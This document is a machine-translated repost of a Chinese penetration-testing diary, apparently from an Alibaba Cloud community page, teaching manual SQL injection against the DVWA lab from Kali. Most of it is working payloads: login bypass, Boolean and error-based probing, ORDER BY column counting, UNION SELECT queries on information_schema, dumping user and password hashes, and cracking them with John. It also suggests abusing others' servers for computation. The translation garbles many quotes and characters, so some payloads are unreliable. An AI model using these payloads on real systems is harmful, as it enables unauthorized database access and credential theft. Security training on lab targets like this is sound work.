Small white diary 39:kali penetration testing of Web infiltration-sql manual injection (i.)

Source: Internet
Author: User

SQL Manual Injection (i)

SQL injection: By inserting a SQL command into a Web form to submit or entering a query string for a domain name or page request, you end up with a malicious SQL command that deceives the server. "SQL injection principle"

# #服务端程序将用户input parameters as query criteria , directly splicing SQL statements, and return the query results to the client browser

User Login Judgment

SELECT * from users WHERE user= ' uname ' and password= ' pass '
SELECT * from users WHERE user= ' name ' and password= 'or ' =' ' or ': logical operator, (password false) ' or ' (' 1 ' = ' 1 ' true) "

where SQL injection exists

URLs for forms, get methods

SQL Detection method

1, error-based detection method (low)

' (single quote)

"(try two single quotes)" Result: 22 closed "

# ' a ' B (single quote +a+ double quote +b)

# ' a ' B ' (single quote +a+ double quote +b+ ')

It proves that complex SQL statements can be constructed to inject




2, Boolean-based detection

First : 1 ' and ' 1 ' = ' 1 equals 1 ' and ' 1 ' guessing statement: Select First_name,surname from Users where id= ' 1 ' a nd ' 1 ' = ' 1 ' "

Second: 1 ' and ' 1 ' = ' 2 equals 1 ' and ' 0 ' If no result is returned, the Guess statement can be verified "

3. Number of table columns/display information in which column

' ORDER by 9--(single quotation mark +order by + space + number) that number is used to specify the field, you can fill it out and guess the exact number of columns "+--+ space " be sure to note that there are spaces, otherwise syntax error --: Comment ")

Constructing a SELECT statement

4. Union query "to run the query statement after the filtered single quotation mark"

Union and UNION ALL function basically exactly the same

First : ' Union select 1,2--' determines where the results appear in the page after the query

Second:1 ' Union Select User (), 2--"1" replaced with a database default function user () Querying database User "

' Union Select User (), version ()--"Replace 2 with the function versions () Query Edition"

Database () querying the name

Global function: @ @datadir Querying the file location of the database

@ @hostname Query Host name

@ @version_compile_os Querying operating system version

Constructing a complex SQL statement

' Union Select Database (),Substring_index (USER (), "@", 1)--

For easy viewing instructions, use the Firefox plugin hackbug, use F9 to recall

Bypass some of the mechanisms that are not tightly filtered

CHAR () Converts the ASCII code to the corresponding character

Connection character

CONCAT_WS () joins multiple functions together

Compute MD5 "can be used to do a lot of data for yourself using someone else's server resources"

Understanding the data structure of a database

MySQL: All meta data is saved in a metadata table "Information_schema"

1. View the number of tables in all tables/statistics libraries for all libraries

' Union select Table_name,table_schema from information_schema.tables--+ [All libraries all tables]

' UNION Select Table_schema,count (*) from Information_schema.tables GROUP by Table_schema--[count of tables in each library]

2, the table name in the DVWA Library "A parameter vulnerability can also cause drag library"

' Union select Table_name,table_schema from Information_schema.tables where table_schema= ' dvwa '--+ ' guessing account password location by table name '

3. Query all the columns in the Users table (user_id, first_name, last_name, user, password, avatar)

' Union select Table_name,column_name from Information_schema.columns where table_schema= ' Dvwa ' and table_name= ' users '- -+

4, query the contents of user, password column

' Union select User,password from dvwa.users--+

' Union select User,password from users--+

' Union select NULL, CONCAT (User,0x3a,password) from users--+ "Concat: Connection, specify delimiter"

5. Password cracking

Guessing cipher algorithm: Hash-identifier

Username:passhash--> Dvwa.txt "put account: Password into a text file"

John--format=raw-md5 Dvwa.txt

Small white diary 39:kali penetration testing of Web infiltration-sql manual injection (i.)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.